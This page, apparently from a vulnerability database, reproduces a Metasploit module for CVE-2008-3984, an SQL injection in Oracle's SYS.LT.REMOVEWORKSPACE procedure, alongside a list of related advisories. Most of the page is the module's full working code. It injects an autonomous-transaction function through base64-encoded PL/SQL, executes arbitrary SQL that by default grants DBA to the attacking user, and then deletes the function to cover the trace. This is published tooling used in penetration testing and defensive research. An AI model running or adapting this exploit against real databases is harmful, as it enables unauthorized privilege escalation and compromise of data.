Lucene search
K

Oracle DB SQL Injection Via SYS.LT.REMOVEWORKSPACE

🗓️ 31 Aug 2024 00:00:00Reported by Jay Turla, metasploit.comType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 163 Views

Oracle DB SQL Injection via SYS.LT.REMOVEWORKSPAC

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2008-3984
6 Jan 200900:00
circl
CVE
CVE-2008-3984
14 Oct 200821:00
cve
Cvelist
CVE-2008-3984
14 Oct 200821:00
cvelist
Metasploit
Oracle DB SQL Injection via SYS.LT.REMOVEWORKSPACE
28 Jul 200913:43
metasploit
NVD
CVE-2008-3984
14 Oct 200821:11
nvd
Oracle
CPUOct2008 Advisory
14 Oct 200800:00
oracle
Tenable Nessus
Oracle Database Multiple Vulnerabilities (October 2008 CPU)
16 Nov 201100:00
nessus
Prion
Design/Logic Flaw
14 Oct 200821:11
prion
Prion
Design/Logic Flaw
14 Oct 200821:11
prion
Prion
Design/Logic Flaw
14 Oct 200821:11
prion
Rows per page
`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Exploit::ORACLE  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'Oracle DB SQL Injection via SYS.LT.REMOVEWORKSPACE',  
'Description' => %q{  
This module exploits a sql injection flaw in the REMOVEWORKSPACE  
procedure of the PL/SQL package SYS.LT. Any user with execute  
privilege on the vulnerable package can exploit this vulnerability.  
},  
'Author' => [ 'Sh2kerr <research[ad]dsecrg.com>' ],  
'License' => MSF_LICENSE,  
'References' =>  
[  
[ 'CVE', '2008-3984' ],  
[ 'OSVDB', '49326']  
],  
'DisclosureDate' => '2008-10-13'))  
  
register_options(  
[  
OptString.new('SQL', [ false, 'SQL to execte.', "GRANT DBA to #{datastore['DBUSER']}"]),  
])  
end  
  
def run  
return if not check_dependencies  
  
name = Rex::Text.rand_text_alpha_upper(rand(10) + 1)  
rand1 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)  
rand2 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)  
rand3 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)  
cruft = Rex::Text.rand_text_alpha_upper(1)  
  
function = "  
CREATE OR REPLACE FUNCTION #{cruft}  
RETURN VARCHAR2 AUTHID CURRENT_USER  
AS  
PRAGMA AUTONOMOUS_TRANSACTION;  
BEGIN  
EXECUTE IMMEDIATE '#{datastore['SQL']}';  
COMMIT;  
RETURN '#{cruft}';  
END;"  
  
package1 = %Q|  
BEGIN  
SYS.LT.CREATEWORKSPACE('#{name}'' and #{datastore['DBUSER']}.#{cruft}()=''#{cruft}');  
END;  
|  
  
package2 = %Q|  
BEGIN  
SYS.LT.REMOVEWORKSPACE('#{name}'' and #{datastore['DBUSER']}.#{cruft}()=''#{cruft}');  
END;  
|  
  
uno = Rex::Text.encode_base64(function)  
dos = Rex::Text.encode_base64(package1)  
tres = Rex::Text.encode_base64(package2)  
  
sql = %Q|  
DECLARE  
#{rand1} VARCHAR2(32767);  
#{rand2} VARCHAR2(32767);  
#{rand3} VARCHAR2(32767);  
BEGIN  
#{rand1} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{uno}')));  
EXECUTE IMMEDIATE #{rand1};  
#{rand2} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{dos}')));  
EXECUTE IMMEDIATE #{rand2};  
#{rand3} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{tres}')));  
EXECUTE IMMEDIATE #{rand3};  
END;  
|  
  
clean = "DROP FUNCTION #{cruft}"  
  
# Try first, if it's good.. keep doing the dance.  
print_status("Attempting sql injection on SYS.LT.REMOVEWORKSPACE...")  
begin  
prepare_exec(sql)  
rescue => e  
return  
end  
  
print_status("Removing function '#{cruft}'...")  
prepare_exec(clean)  
  
end  
end  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation